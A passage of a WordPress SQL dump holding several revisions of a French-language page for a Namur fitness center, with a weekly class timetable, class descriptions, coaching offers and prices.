class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-01-18 19:07:15', '2014-01-18 19:07:15', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(417, 1, '2014-01-18 19:08:19', '2014-01-18 19:08:19', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-01-18 19:08:19', '2014-01-18 19:08:19', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(416, 1, '2014-01-18 19:07:48', '2014-01-18 19:07:48', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-01-18 19:07:48', '2014-01-18 19:07:48', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(418, 1, '2014-01-18 19:09:02', '2014-01-18 19:09:02', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-01-18 19:09:02', '2014-01-18 19:09:02', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(419, 1, '2014-01-18 19:11:50', '2014-01-18 19:11:50', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td 